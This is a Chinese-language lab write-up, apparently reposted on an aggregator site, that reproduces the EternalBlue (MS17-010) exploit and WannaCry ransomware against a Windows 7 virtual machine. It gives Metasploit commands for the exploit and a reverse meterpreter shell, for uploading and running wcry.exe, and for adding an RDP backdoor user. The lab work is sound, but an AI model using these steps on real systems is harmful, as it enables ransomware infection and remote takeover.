漏洞簡(jiǎn)介

永恒之藍(lán)利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)的最高權(quán)限，然后通過(guò)惡意代碼掃描開(kāi)放445端口的Windows系統(tǒng)；只要是被掃描到的Windows系統(tǒng)，只要開(kāi)機(jī)上線，不需要用戶進(jìn)行任何操作，即可通過(guò)共享漏洞上傳wannacry勒索病毒，遠(yuǎn)程控制木馬等惡意程序。

準(zhǔn)備過(guò)程

0x00:做好防護(hù)

在復(fù)現(xiàn)過(guò)程中需要先做好防護(hù)，以免造成真機(jī)感染病毒，那就GG了

先將共享文件夾給禁用掉，為了以防萬(wàn)一這里再把真機(jī)的入站規(guī)則改一下，阻止445端口連接

0x02:實(shí)驗(yàn)環(huán)境

kail:192.168.186.134 win7:192.168.186.131 病毒樣本

漏洞復(fù)現(xiàn)

WannaCry是在永恒之藍(lán)的基礎(chǔ)上產(chǎn)生的，因此需要先通過(guò)永恒之藍(lán)獲得shell權(quán)限。

永恒之藍(lán)的編號(hào)是MS17-010，先使用msfconsole搜索一下漏洞模塊

search ms17-010

這里先使用下

auxiliary/scanner/smb/smb_ms17_010

這個(gè)作為搜索模塊對(duì)靶機(jī)進(jìn)行漏洞掃描

發(fā)現(xiàn)存在漏洞（注意在虛擬機(jī)中win7靶機(jī)需要關(guān)閉防火墻才可以發(fā)現(xiàn)），既然有漏洞那下面就使用攻擊模塊

use exploit/windows/smb/ms17_010_eternalblue

設(shè)置一下靶機(jī)的IP地址

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.186.131

再設(shè)置下攻擊的payload，這里選擇

windows/x64/meterpreter/reverse_tcp

最后再設(shè)置一下攻擊機(jī)的IP即可

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.186.134

進(jìn)行攻擊

exploit

攻擊成功，將我們前面準(zhǔn)備好的WannaCry病毒上傳進(jìn)去對(duì)方的主機(jī)中

upload /tmp/wcry.exe c://

進(jìn)入shell權(quán)限，dir一下，發(fā)現(xiàn)上傳成功

執(zhí)行病毒即可

c:\>wcry.exe

接下來(lái)使用一下enable_rdp 腳本來(lái)開(kāi)啟遠(yuǎn)程桌面

run post/windows/manage/enable_rdp #開(kāi)啟遠(yuǎn)程桌面 run post/windows/manage/enable_rdp USERNAME=shy2 PASSWORD=123456 #添加用戶 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #將3389端口轉(zhuǎn)發(fā)到6662

遠(yuǎn)程桌面連接Win7

rdesktop 192.168.190.131:3389

復(fù)現(xiàn)成功

總結(jié)：

復(fù)現(xiàn)該病毒時(shí)一定要注意做好防護(hù)，這類病毒的傳播性很強(qiáng)切勿用于惡作劇，切記切記！

總結(jié)

以上是生活随笔為你收集整理的勒索病毒“WannaCry”复现的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。